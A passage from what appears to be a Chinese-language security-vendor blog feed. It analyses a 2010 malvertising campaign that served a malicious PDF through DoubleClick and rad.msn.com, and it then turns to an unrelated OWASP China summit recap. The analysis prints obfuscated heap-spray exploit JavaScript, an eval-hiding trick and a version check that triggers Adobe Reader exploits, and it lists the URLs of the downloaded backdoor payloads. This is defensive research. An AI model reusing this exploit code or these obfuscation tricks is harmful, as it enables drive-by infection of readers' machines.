YYYfYYYiYYYxYYY_YYYiYYYtYYY(YYYyYYYaYYYrYYYsYYYpYYY,YYYlYYYeYYYnYYY)YYY YYY{YYY\rYYY\nYYYwYYYhYYYiYYYlYYYeYYY(YYYyYYYaYYYrYYYsYYYpYYY.YYYlYYYeYYYnYYYgYYYtYYYhYYY*YYY2YYY<YYYlYYYeYYYnYYY)YYY YYY{YYY YYYyYYYaYYYrYYYsYYYpYYY+YYY=YYYyYYYaYYYrYYYsYYYpYYY;YYY YYY}YYY\rYYY\nYYYyYYYaYYYrYYYsYYYpYYY=YYYyYYYaYYYrYYYsYYYpYYY.YYYsYYYuYYYbYYYsYYYtYYYrYYYiYYYnYYYgYYY(YYY0YYY,YYYlYYYeYYYnYYY/YYY2YYY)YYY;YYY\rYYY\nYYYrYYYeYYYtYYYuYYYrYYYnYYY YYYyYYYaYYYrYYYsYYYpYYY;YYY YYY}YYY\rYYY\nYYYvYYYaYYYrYYY YYYsYYYhYYYeYYYlYYYlYYYcYYYoYYYdYYYeYYY=YYYuYYYnYYYeYYYsYYYcYYYaYYYpYYYeYYY(YYYsYYYhYYYcYYYoYYYdYYYeYYY(YYYsYYYhYYYcYYYoYYYdYYYeYYY_YYYcYYYoYYYlYYYlYYYaYYYbYYY)YYY)YYY;YYY\rYYY\nYYYvYYYaYYYrYYY YYYmYYYeYYYmYYY_YYYaYYYrYYYrYYYaYYYyYYY=YYYnYYYeYYYwYYY YYYAYYYrYYYrYYYaYYYyYYY(YYY)YYY;YYY\rYYY\nYYYvYYYaYYYrYYY YYYcYYYcYYY=YYY0YYYxYYY0YYYcYYY0YYYcYYY0YYYcYYY0YYYcYYY;YYY\rYYY\nYYYvYYYaYYYrYYY YYYaYYYdYYYdYYYrYYY=YYY0YYYxYYY4YYY0YYY0YYY0YYY0YYY0YYY;YYY\rYYY\nYYYvYYYaYYYrYYY YYYsYYYcYYY_YYYlYYYeYYYnYYY=YYYsYYYhYYYeYYYlYYYlYYYcYYYoYYYdYYYeYYY.YYYlYYYeYYYnYYYgYYYtYYYhYYY*YYY2YYY;YYY\rYYY\nYYYvYYYaYYYrYYY YYYlYYYeYYYnYYY=YYYaYYYdYYYdYYYrYYY-YYY(YYYsYYYcYYY_YYYlYYYeYYYnYYY+YYY0YYYxYYY3YYY8YYY)YYY;YYY\rYYY\nYYYvYYYaYYYrYYY YYYyYYYaYYYrYYYsYYYpYYY=YYYuYYYnYYYeYYYsYYYcYYYaYYYpYYYeYYY(YYY\"YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY\"YYY)YYY;YYY\rYYY\nYYYyYYYaYYYrYYYsYYYpYYY=YYYfYYYiYYYxYYY_YYYiYYYtYYY(YYYyYYYaYYYrYYYsYYYpYYY,YYYlYYYeYYYnYYY)YYY;YYY\rYYY\nYYYvYYYaYYYrYYY YYYcYYYoYYYuYYYnYYYtYYY2YYY=YYY(YYYcYYYcYYY-YYY0YYYxYYY4YYY0YYY0YYY0YYY0YYY0YYY)YYY/YYYaYYYdYYYdYYYrYYY;YYY\rYYY\nYYYfYYYoYYYrYYY(YYYvYYYaYYYrYYY YYYcYYYoYYYuYYYnYYYtYYY=YYY0YYY;YYYcYYYoYYYuYYYnYYYtYYY<YYYcYYYoYYYuYYYnYYYtYYY2YYY;YYYcYYYoYYYuYYYnYYYtYYY+YYY+YYY)YYY YYY{YYYmYYYeYYYmYYY_YYYaYYYrYYYrYYYaYYYyYYY[YYYcYYYoYYYuYYYnYYYtYYY]YYY=YYYyYYYaYYYrYYYsYYYpYYY+YYYsYYYhYYYeYYYlYYYlYYYcYYYoYYYdYYYeYYY;YYY YYY}YYY\rYYY\nYYYvYYYaYYYrYYY YYYoYYYvYYYeYYYrYYYfYYYlYYYoYYYwYYY=YYYuYYYnYYYeYYYsYYYcYYYaYYYpYYYeYYY(YYY\"YYY%YYYuYYY0YYYcYYY0YYYcYYY%YYYuYYY0YYYcYYY0YYYcYYY\"YYY)YYY;YYY\rYYY\nYYYwYYYhYYYiYYYlYYYeYYY(YYYoYYYvYYYeYYYrYYYfYYYlYYYoYYYwYYY.YYYlYYYeYYYnYYYgYYYtYYYhYYY<YYY4YYY4YYY9YYY5YYY2YYY)YYY YYY{YYYoYYYvYYYeYYYrYYYfYYYlYYYoYYYwYYY+YYY=YYYoYYYvYYYeYYYrYYYfYYYlYYYoYYYwYYY;YYY YYY}YYY\rYYY\nYYYtYYYhYYYiYYYsYYY.YYYcYYYoYYYlYYYlYYYaYYYbYYYSYYYtYYYoYYYrYYYeYYY=YYYCYYYoYYYlYYYlYYYaYYYbYYY.YYYcYYYoYYYlYYYlYYYeYYYcYYYtYYYEYYYmYYYaYYYiYYYlYYYIYYYnYYYfYYYoYYY(YYY YYY{YYY YYYsYYYuYYYbYYYjYYY:YYY\"YYY\"YYY,YYYmYYYsYYYgYYY:YYYoYYYvYYYeYYYrYYYfYYYlYYYoYYYwYYY YYY}YYY YYY)YYY;YYY YYY\rYYY\nYYY\rYYY\nYYY}YYY\rYYY\nYYY\rYYY\nYYYaYYYPYYYlYYYuYYYgYYYiYYYnYYYsYYY YYY=YYY YYYaYYYpYYYpYYY.YYYpYYYlYYYuYYYgYYYIYYYnYYYsYYY;YYY\rYYY\nYYYvYYYaYYYrYYY YYYsYYYvYYY=YYYpYYYaYYYrYYYsYYYeYYYIYYYnYYYtYYY(YYYaYYYpYYYpYYY.YYYvYYYiYYYeYYYwYYYeYYYrYYYVYYYeYYYrYYYsYYYiYYYoYYYnYYY.YYYtYYYoYYYSYYYtYYYrYYYiYYYnYYYgYYY(YYY)YYY.YYYcYYYhYYYaYYYrYYYAYYYtYYY(YYY0YYY)YYY)YYY;YYY\rYYY\nYYYfYYYoYYYrYYY YYY(YYYvYYYaYYYrYYY YYYiYYY=YYY0YYY;YYY YYYiYYY YYY<YYY YYYaYYYPYYYlYYYuYYYgYYYiYYYnYYYsYYY.YYYlYYYeYYYnYYYgYYYtYYYhYYY;YYY YYYiYYY+YYY+YYY)YYY\rYYY\nYYY YYY YYY{YYY\rYYY\nYYY YYY YYY YYY YYYiYYYfYYY YYY(YYYaYYYPYYYlYYYuYYYgYYYiYYYnYYYsYYY[YYYiYYY]YYY.YYYnYYYaYYYmYYYeYYY=YYY=YYY\"YYYEYYYSYYYcYYYrYYYiYYYpYYYtYYY\"YYY)YYY\rYYY\nYYY YYY YYY YYY YYY YYY YYY{YYY\rYYY\nYYY YYY YYY YYY YYY YYY YYY YYY YYYvYYYaYYYrYYY YYYlYYYvYYY=YYYaYYYPYYYlYYYuYYYgYYYiYYYnYYYsYYY[YYYiYYY]YYY.YYYvYYYeYYYrYYYsYYYiYYYoYYYnYYY;YYY\rYYY\nYYY YYY YYY YYY YYY YYY YYY}YYY\rYYY\nYYY YYY YYY}YYY YYY YYY\rYYY\nYYYiYYYfYYY YYY(YYY(YYYlYYYvYYY=YYY=YYY9YYY)YYYYYYYYY(YYY(YYYsYYYvYYY=YYY=YYY8YYY)YYY&YYY&YYY(YYYlYYYvYYY<YYY=YYY8YYY.YYY1YYY2YYY)YYY)YYY)YYY\rYYY\nYYY YYY YYY{YYY\rYYY\nYYY YYY YYY YYY YYYgYYYeYYYtYYYiYYYcYYYoYYYnYYY(YYY)YYY;YYY\rYYY\nYYY YYY YYY}YYY\rYYY\nYYYeYYYlYYYsYYYeYYY YYYiYYYfYYY YYY(YYYlYYYvYYY=YYY=YYY7YYY.YYY1YYY)YYY\rYYY\nYYY YYY YYY{YYY\rYYY\nYYY YYY YYY YYY YYYpYYYrYYYiYYYnYYYtYYYfYYY(YYY)YYY;YYY\rYYY\nYYY YYY YYY}YYY\rYYY\nYYYeYYYlYYYsYYYeYYY YYYiYYYfYYY YYY(YYY(YYY(YYYsYYYvYYY=YYY=YYY6YYY)YYYYYYYYY(YYYsYYYvYYY=YYY=YYY7YYY)YYY)YYY&YYY&YYY(YYYlYYYvYYY<YYY7YYY.YYY1YYY1YYY)YYY)YYY\rYYY\nYYY YYY YYY{YYY\rYYY\nYYY YYY YYY YYY YYYcYYYoYYYlYYYlYYYaYYYbYYY(YYY)YYY;YYY\rYYY\nYYY YYY YYY}YYY\rYYY\nYYYeYYYlYYYsYYYeYYY YYYiYYYfYYY YYY(YYY(YYYlYYYvYYY YYY>YYY=YYY YYY9YYY.YYY1YYY)YYY YYYYYYYYY YYY(YYYlYYYvYYY YYY<YYY=YYY YYY9YYY.YYY2YYY)YYY YYYYYYYYY YYY(YYYlYYYvYYY YYY>YYY=YYY YYY8YYY.YYY1YYY3YYY)YYY YYYYYYYYY YYY(YYYlYYYvYYY YYY<YYY=YYY YYY8YYY.YYY1YYY7YYY)YYY)YYY\rYYY\nYYY YYY YYY{YYY\rYYY\nYYY YYY YYY YYY YYYnYYYpYYYlYYYaYYYyYYYeYYYrYYY(YYY)YYY;YYY\rYYY\nYYY YYY YYY}YYY\rYYY\n';th("var oesfeufxntyi = cwyuvaooeo.re"+"pla"+"ce(/[Y]/g,'');");/* avqjavi766743 = 60; <owzeuouz106118> */var ugyolugwu968354 = "_e75af8ac39f";/* vuyiua152184 = 76; <zriefda431629> */var iuoeonh343430 = "_21d716ac020";var evaiwueei264011 = "_7ed30974517";/* rlaoaya455073 = 95; <geaaoo654855> */var iuzxgj474859 = "_3046be797c0";var pewzyahmfb544339 = "_8bdfb70b60f";/* seiiaue71607 = 39; <unzoe856710> *//* yuydi485926 = 1; <dkykz871039> */var pgsinuunf = 100;/* hucrbdit453671 = 76; <nyyrrazqy740615> *//* namdkey949757 = 64; <yzdee833418> */var vuveioae876679 = "_0328e8fa935";/* iuoytl56881 = 46; <oiowiea705586> *//* ntpadaq590040 = 38; <ovkcjaka633301> */var gpyousxo = '';/* auomgyoed16943 = 82; <mumaa309375> */var xaeuhifje753328 = "_16533722a29";/* kmuiuayg202152 = 98; <asuuhlhy426995> *//* upcowvqa721683 = 3; <aydaeauo365685> */sauavlepu0 = oesfeufxntyi;var ayuyg642660 = "_15f35fef3a2";/* uedaeig772200 = 27; <oucyueo443122> *//* uyqota442513 = 52; <iyxuoa210597> *//* eyaye796590 = 43; <iaooywuv348521> */for(alookaaraaio=0;alookaaraaio<pgsinuunf;alookaaraaio++) {var vauiauyyfcfi = 'function a1106889858(fa) {return fa;} var a266415535 = 281772104;function a454936894(fa) {return fa;} var a289990746 = 1206395987;function a606709841(fa) {return fa;} var a814629542 = 809599932;function a975519308(fa) {return fa;} var a73837795 = 418139819;function a1311395772(fa) {return fa;} var a102714415 = 1168743178;function a457025328(fa) {return fa;} var a106369175 = 824445897;';var vauiauyyfcfi = vauiauyyfcfi+vauiauyyfcfi+vauiauyyfcfi+vauiauyyfcfi+vauiauyyfcfi+vauiauyyfcfi+vauiauyyfcfi;var vauiauyyfcfi = vauiauyyfcfi+vauiauyyfcfi+vauiauyyfcfi+vauiauyyfcfi;var dsfsg = alookaaraaio+1;gpyousxo = 'var sauavlepu'+dsfsg+'=sauavlepu'+alookaaraaio+';'+vauiauyyfcfi+''+vauiauyyfcfi+''+vauiauyyfcfi+'';th(gpyousxo);}th(sauavlepu100);var okyyyornb516688 = "_3ffdcb9f05e";var pquxtoa762840 = "_68a883464be";/* yryeie384069 = 97; <aeyoboeaa202244> */<br /><br />//</ACRO_script><br /><br />//</Document-Actions><br /><br /></pre><br />這段混碼的手法算蠻老練的,很顯然的花了不少手工在上面,而這個javascript程式碼是用ASCII85來做混碼的。<br /><br />首先這個解混碼的函數為:<br /><br />function ghfsdj(adbhsdh)<br />{<br />var jfsd = "gas%ss2u";<br />return adbhsdh.split("&&").join(jfsd[3]+jfsd[7]);<br />}<br /><br />下面這段shellcode的片段就是利用這個函數來解混碼:<br /><br />shcode_geticon = ghfsdj("&&D2CE&&D6D2&&899C&&C589&&CAC9&&C...");<br />shcode_newplayer = ghfsdj("&&D2CE&&D6D2&&899C&&C589&&CAC9&&CBC..");<br />shcode_printf = ghfsdj("&&D2CE&&D6D2&&899C&&C589..");<br />shcode_collab = ghfsdj("&&D2CE&&D6D2&&899C&&C589&&CA..");<br /><br />解混碼函數會將&&置換成%u。然後用為了躲避pattern-based的偵測(如AntiVirus),它用了一個有趣的戲法就是將eval()這個函數拆解,試圖來隱藏它:<br /><br />var ev = 'yeegsgvsssaglh';<br />..<br />this[ev.charAt (2) + ev.charAt (6) + ev.charAt (10) + ev.charAt (12)] ('var th = thi' + 's[\'ev\'+\'\'+\'al\'];');<br /><br />被解碼出來的javascript包含了許多不同漏洞的exploit code如下所示:<br /><br />a) Adobe Reader and Acrobat 9.x Doc.media.newPlayer (<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4324">(CVE-2009-4324)</a>)<br /><br />b) Adobe Acrobat and Reader util.printf <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-2992">(CVE-2008-2992)</a><br /><br />c) Adobe Reader and Adobe Acrobat 9 GetIcon (<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0927">CVE-2009-0927</a>)<br /><br />d) Adobe Reader GetMailInfo (<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2007-5659">CVE-2007-5659</a>)<br /><br />而下面的這段javascript是用的比對主機是否含有對應漏洞的Adobe Reader版本,一旦發現就觸發對應的Exploit code:<br /><pre class="brush: js;"><br />aPlugins = app.plugIns;<br /><br />var sv=parseInt(app.viewerVersion.toString().charAt(0));<br /><br />for (var i=0; i < aPlugins.length; i++)<br /><br /> {<br /><br /> if (aPlugins[i].name=="EScript")<br /><br /><br /><br />{<br /><br /> var lv=aPlugins[i].version;<br /><br /> }<br /><br /> }<br /><br />if ((lv==9)((sv==8)&&(lv<=8.12)))<br /><br /> {<br /><br /><br /><br />geticon();<br /><br /> }<br /><br />else if (lv==7.1)<br /><br /> {<br /><br /> printf();<br /><br /> }<br /><br />else if (((sv==6)(sv==7))&&(lv<7.11))<br /><br /> {<br /><br /> collab();<br /><br /> }<br /><br /> else if ((lv >= 9.1) (lv <= 9.2) (lv >= 8.13) (lv <= 8.17))<br /><br /> {<br /><br /> nplayer();<br /><br /> }<br /><br /></pre><br />最初,防毒軟體針對這個惡意PDF的偵測率實在相當低--<a href="http://www.virustotal.com/file-scan/report.html?id=a047af72df4d2e937c023acee2ca1f2592c85503a3eebf8f791d03b6ac2001fb-1291905272">在VirusTotal上42家掃毒,只有2家掃到</a>。之後是有好一點,但掃到的還是不多。<br /><br />在成功打到漏洞後,會來執行shellcode,然後下載以下執行檔並運行它們:<br />1. file.exe (HDD Plus), from: http://colemuns.com/pupseg/forum.php?f=MDAC&key=92e93d0553cdb3c89d7d397457811f6d&u=root, <a href="http://www.virustotal.com/file-scan/report.html?id=f9ee1198bc82efb19574187a9ace23999e3d8b8201de9a5554c86b9024aaca79-1291801624">Virus Total的掃瞄結果</a>。<br />2. 461-direct.exe (backdoor), from: http://searchjewel.org/any5/461-direct.exe, <a href="http://www.virustotal.com/file-scan/report.html?id=8d4094da3e233393e39172028f7f3256e0346acd08e9625009b97a3cbf9d7f86-1291766435">Virus Total的掃瞄結果</a>。<br /><br />註: 這些執行檔在過去幾天都持續的換來換去的(不見得就是上面所列的)。<br /><br />其它所安裝的惡意程式,為一個名叫Kazy惡意程式的downloader,這邊是VirusTotal的報告請看<a href="http://www.virustotal.com/file-scan/report.html?id=5d925c4bd60f188694fb94ef77c27df34be60c0844721447e6d83962602a7428-1291976690">這邊</a>.<br /><br /><br /><b>第二部份--rad.msn.com個案研究</b><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_hELDi5B8zOI/TQLz0FY7NgI/AAAAAAAACJI/KsAHLnLbAB0/s1600/rad_msn_com_hdd_plus_adshufffle_illu.png"><img id="BLOGGER_PHOTO_ID_5549265766999340546" style="DISPLAY: block; MARGIN: 0px auto 10px; WIDTH: 748px; CURSOR: hand; TEXT-ALIGN: center" alt="" src="http://4.bp.blogspot.com/_hELDi5B8zOI/TQLz0FY7NgI/AAAAAAAACJI/KsAHLnLbAB0/s1600/rad_msn_com_hdd_plus_adshufffle_illu.png" border="0" /></a><br /><br />一開始這個ADShufffle的惡意廣告先在rad.msn.com進行散播,然後是DoubleClick。然而它的行為是十分相像的。<br /><br />在瀏覽一個含有rad.msn.com廣告的網站,例如mail.live.com、msnbc.com或realestate.msn.com這些網站<br />,瀏覽器中會看到來自rad.msn.com的一個大小為728x90廣告標籤:<br /><pre class="brush: js;"><br /><script type="text/javascript" src="http://rad.msn.com/ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=REAB01&AP=1390" onreadystatechange="startTimer();"></script><br /><br /></pre><br />這邊rad.msn.com也丟出了一些混碼的javascript,經過解碼後如下所示:<br /><pre class="brush: js;"><br /><script type="text/javascript" src="http://this.content.served.by.adshufffle.com/p/kl/46/799/r/12/4/8/ast0k3n/cj_K_lW0d4_D7mmLupb1TWfhr91mfhH0/view.js/?sid=23444436&lpd=${REQUESTID}&ASTPCT=${CLICKURL}"><script><br /><br /></pre><br />這邊瀏覽器因為同樣是載入adshufffle的惡意廣告,所以又再次看到實際大小為728x90的廣告。而它的內容是非法拷貝來的 http://media.topsann.com/bdb/aBigCommerce/728x90stat.gif:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_hELDi5B8zOI/TQMPoPLV__I/AAAAAAAACJY/I97P0MjcXWw/s1600/728x90stat.gif"><img id="BLOGGER_PHOTO_ID_5549296349793878002" style="DISPLAY: block; MARGIN: 0px auto 10px; CURSOR: hand; TEXT-ALIGN: center" alt="" src="http://3.bp.blogspot.com/_hELDi5B8zOI/TQMPoPLV__I/AAAAAAAACJY/I97P0MjcXWw/s1600/728x90stat.gif" border="0" /></a><br /><br />之後的結果就跟上面的DoubleClick個案是類似的。<br /><br />在阿碼科技從2000年開始開發偵測drive-by downloads的技術在2003年的<a href="http://www.openwaves.net/">WWW研討會(WWW 2003)</a>上第一次正式公開發表,在2007年我們收購了X-Solve推出了drive-by download的偵測服務:<b>HackAlert</b>,在最近為了針對惡意廣告的偵測以及提供各大媒體產業的使用,我們推出了一個新版的HackAlert----<a href="http://www.armorize.com/index.php?link_id=SafeImpression">HackAlert SafeImpression</a>。<br /><br />如果您對任何資料有興趣, 請email告訴我們: hackalert@armorize.com<br /><br /><br />相關報導<br /><br />資安業者:惡意廣告透過DoubleClick及msn散布<br />文/陳曉莉 (編譯) 2010-12-13<br /><a href="http://www.ithome.com.tw/itadm/article.php?c=64998">http://www.ithome.com.tw/itadm/article.php?c=64998</a><br /><br />Google, Microsoft ad networks briefly hit by with malware<br />Doubleclick and Hotmail sites caught serving malicious ads<br />by Robert McMillan<br /><a href="http://www.computerworld.com/s/article/9200899/Google_Microsoft_ad_networks_briefly_hit_by_with_malware">http://www.computerworld.com/s/article/9200899/Google_Microsoft_ad_networks_briefly_hit_by_with_malware</a><br /><br />Google DoubleClick Caught Serving Malicious Ad<br />By Kim Zetter December 10, 2010 3:09 pm Categories: Cybersecurity<br /><a href="http://www.wired.com/threatlevel/2010/12/doubleclick/">http://www.wired.com/threatlevel/2010/12/doubleclick/</a><br /><br />Google’s DoubleClick and Microsoft’a adCenter Ad Networks Hit By Malicious Advertisements<br /><a href="http://www.ditii.com/2010/12/11/googles-doubleclick-and-microsofta-adcenter-ad-networks-hit-by-malicious-advertisements/">http://www.ditii.com/2010/12/11/googles-doubleclick-and-microsofta-adcenter-ad-networks-hit-by-malicious-advertisements/</a><br /><br />Researchers: Major Ad Networks Serving Malware<br />Posted by George Hulme, Dec 11, 2010 01:44 PM<br /><a href="http://www.informationweek.com/blog/main/archives/2010/12/researchers_maj.html;jsessionid=K3Y1VR1NKMI5ZQE1GHPCKH4ATMY32JVN">http://www.informationweek.com/blog/main/archives/2010/12/researchers_maj.html;jsessionid=K3Y1VR1NKMI5ZQE1GHPCKH4ATMY32JVN</a><br /><br />Google, Microsoft Ad Networks Under Malware Attacks<br />Robert McMillan (IDG News Service) 13 December, 2010 04:47<br /><a href="http://www.pcworld.idg.com.au/article/371038/google_microsoft_ad_networks_briefly_hit_by_malware/">http://www.pcworld.idg.com.au/article/371038/google_microsoft_ad_networks_briefly_hit_by_malware/</a><br /><br />Malware Found In Ads Served By DoubleClick<br />Posted by Frank Watson on December 11, 2010 11:05 AM<br /><a href="http://blog.searchenginewatch.com/101211-110542">http://blog.searchenginewatch.com/101211-110542</a><br /><br />Big Embarrassment For Google, Cyber Criminals Tricked Google In Serving Malware Ads<br />Posted: 11th December 2010 by admin in Google, Internet, Security<br /><a href="http://essayboard.com/2010/12/11/big-embarrassment-for-google-cyber-criminals-tricked-google-in-serving-malware-ads/">http://essayboard.com/2010/12/11/big-embarrassment-for-google-cyber-criminals-tricked-google-in-serving-malware-ads/</a><br /><br />米Google、MSのアドネットワークで悪意ある広告の配信:サイトを閲覧するだけで感染のおそれ<br />2010年12月11日 15:16<br /><a href="http://www.zaikei.co.jp/article/20101211/63829.html">http://www.zaikei.co.jp/article/20101211/63829.html</a><br /><br />Doubleclick and MSN serve up malware<br />13 Dec 2010 08:23 by Nick Farrell in Rome posted in Security<br /><a href="http://www.techeye.net/security/doubleclick-and-msn-serve-up-malware#ixzz17yknuAcz">http://www.techeye.net/security/doubleclick-and-msn-serve-up-malware#ixzz17yknuAcz</a><br /><br />Infectados los Ads de Google y Microsoft!!!<br />diciembre 12, 2010<br /><a href="http://www.tknologyk.net/?p=2444">http://www.tknologyk.net/?p=2444</a><br /><br />Two Major Ad Networks Found Serving Malware<br />Posted by samzenpus on Monday December 13, @12:06AM<br /><a href="http://tech.slashdot.org/story/10/12/13/0128249/Two-Major-Ad-Networks-Found-Serving-Malware?from=rss">http://tech.slashdot.org/story/10/12/13/0128249/Two-Major-Ad-Networks-Found-Serving-Malware?from=rss</a><br /><br />Major Ad Networks Found Serving Malicious Ads<br />December 12, 2010, 6:00PM by Dennis Fisher<br /><a href="https://threatpost.com/en_us/blogs/major-ad-networks-found-serving-malicious-ads-121210">https://threatpost.com/en_us/blogs/major-ad-networks-found-serving-malicious-ads-121210</a><br /><br />Google DoubleClick Found Serving Malicious Ad<br />Brian Prince 2010-12-10<br /><a href="http://www.eweek.com/c/a/Security/Google-DoubleClick-Found-Serving-Malicious-Ad-685431/">http://www.eweek.com/c/a/Security/Google-DoubleClick-Found-Serving-Malicious-Ad-685431/</a><br /><br />Ad firms are offering HDD malware<br />By David Neal<br />Mon Dec 13 2010, 14:30<br /><a href="http://www.theinquirer.net/inquirer/news/1932033/firms-offering-hdd-malware">http://www.theinquirer.net/inquirer/news/1932033/firms-offering-hdd-malware</a><br /><br /></span><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1441759431140700676-1128762823878700173?l=armorize-cht.blogspot.com' alt='' /></div><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=XO4aSs-9DhU:d0qIaB6QvQg:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=XO4aSs-9DhU:d0qIaB6QvQg:63t7Ie-LG7Y"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?d=63t7Ie-LG7Y" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=XO4aSs-9DhU:d0qIaB6QvQg:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?i=XO4aSs-9DhU:d0qIaB6QvQg:V_sGLiPBpWU" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/blogspot/armorize_cht/~4/XO4aSs-9DhU" height="1" width="1"/>Chrishttp://www.blogger.com/profile/01653790213029148763noreply@blogger.com1http://armorize-cht.blogspot.com/2010/12/google%E5%8F%8Amicrosoft%E7%9A%84%E5%85%A9%E5%A4%A7%E5%BB%A3%E5%91%8A%E5%B9%B3%E5%8F%B0%E9%81%AD%E6%8E%9B%E9%A6%AC%E5%88%A9%E7%94%A8%E6%95%A3%E6%92%AD%E6%83%A1%E6%84%8F%E8%BB%9F%E4%BB%B6.htmltag:blogger.com,1999:blog-1441759431140700676.post-44299391195982599752010-10-26T03:36:00.044+08:002010-10-30T00:12:32.399+08:002010-10-30T00:12:32.399+08:00OWASP 2010 中國峰會隨筆(摘錄萬馬奔騰演講)自 2009 年底至今,阿碼來過中國好多次,包括上海、廣州、深圳等地。而其中北京給我們的感覺是一個古今結合(保留完整的京師九門、曲折幽深的胡同、譜出無數英雄傳奇的中關村、寸土寸金的 CBD 地區、一系列奧運會的聚睛建築如鳥巢、水立方、央視新大樓等)、地鐵便捷(近十條路線,平民價兩塊人民幣),以及四季分明的城市。說到氣候,我們感受特深,這北京是春天沙塵暴(空氣品質差,能見度也低),夏天炎熱(西裝筆挺等於汗如雨下),冬天寒冷(路邊積雪可多天不退),只有秋天氣候宜人、天高氣爽,真是一年最好的季節。<br /><br />此次 Wayne 和 Matt 委派我和 Vincent 來北京,就只為了 <a href="http://www.owasp.org/index.php/OWASP_China_Summit_2010">OWASP 2010 中國峰會</a> 這個盛事,而礙於大家的行程都十分緊湊,原本要一同過來的 Sunrise 和 James 改留在公司全力幫忙處理仍在進行中的工作,情義相挺,甚為感謝!! 與會前我們家的各項繁瑣籌備工作,機票酒店行程安排,展場工程聯繫協調,議程跟催,我們沒有龐大的行銷團隊,Jason 一肩扛下一人搞定,感佩!! Thank you!! <br /><br />在中國的產官學界大力支持下,作為全球知名的應用安全組織 <a href="http://www.owasp.org">OWASP(Open Web Application Security Project)</a>順利圓滿於北京舉辦以「應用安全」為主軸,讓資訊安全意識、知識、技術在中國更為廣泛而深入的加以推廣與積極交流。<br /><br />本次 OWASP 2010 中國峰會特別邀請政府、金融、網際網絡、教育、電信等熱門行業的領導,其中包括公安部、中國軟件學院、中國測評中心、中國互聯網網路中心,國內外知名的應用安全專家、<a href="http://www.owasp.org/index.php/OWASP_China_Summit_2010#tab=Sponsors">廠商代表與媒體夥伴</a>共聚一堂。<br /><br />阿碼科技此次與有榮焉、共襄盛舉。<br /><span style="font-weight:bold;"><br />OWASP 中國峰會大會現場</span><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_yf4OE0MUhMQ/TMiUDpPM-yI/AAAAAAAABQo/1RDAEfrXutM/s1600/owasp3+(1024x576).jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 180px;" src="http://1.bp.blogspot.com/_yf4OE0MUhMQ/TMiUDpPM-yI/AAAAAAAABQo/1RDAEfrXutM/s320/owasp3+(1024x576).jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5532834932554791714" /></a><br /><br /><span style="font-weight:bold;">OWASP 中國峰會給阿碼的第一排貴賓席(哎呀,不是那個瑪)</span><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_yf4OE0MUhMQ/TMiLlcka4UI/AAAAAAAABOY/VaCy9JpD3-A/s1600/owasp_benson_seat+(1024x576).jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 180px;" src="http://2.bp.blogspot.com/_yf4OE0MUhMQ/TMiLlcka4UI/AAAAAAAABOY/VaCy9JpD3-A/s320/owasp_benson_seat+(1024x576).jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5532825617665024322" /></a><br /><br /><span style="font-weight:bold;">現場宣傳DM (對我們家超強設計師 Joe 由衷敬佩,感謝!!)</span><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_yf4OE0MUhMQ/TMiJviPayqI/AAAAAAAABOI/cte0lc4dEWQ/s1600/owasp_armorize_ad+(662x919).jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 230px; height: 320px;" src="http://3.bp.blogspot.com/_yf4OE0MUhMQ/TMiJviPayqI/AAAAAAAABOI/cte0lc4dEWQ/s320/owasp_armorize_ad+(662x919).jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5532823591962987170" /></a><br /><br /><span style="font-weight:bold;">會場攤位(Vincent 校長兼撞鐘,攤位都是他在招呼,辛苦了!)</span><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_yf4OE0MUhMQ/TMiIZUe9e_I/AAAAAAAABOA/HVHGyt5Iq2g/s1600/owasp_armorize+(1024x576).jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 180px;" src="http://1.bp.blogspot.com/_yf4OE0MUhMQ/TMiIZUe9e_I/AAAAAAAABOA/HVHGyt5Iq2g/s320/owasp_armorize+(1024x576).jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5532822110801329138" /></a><br /><br /><span style="font-weight:bold;">鑽石贊助(感謝管理階層與董事會的支持!!)</span><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_yf4OE0MUhMQ/TMiHsWlGK9I/AAAAAAAABN4/DAMPArOP8g0/s1600/owasp_sponsor+(517x698).jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 237px; height: 320px;" src="http://2.bp.blogspot.com/_yf4OE0MUhMQ/TMiHsWlGK9I/AAAAAAAABN4/DAMPArOP8g0/s320/owasp_sponsor+(517x698).jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5532821338269821906" /></a><br /><br /><span 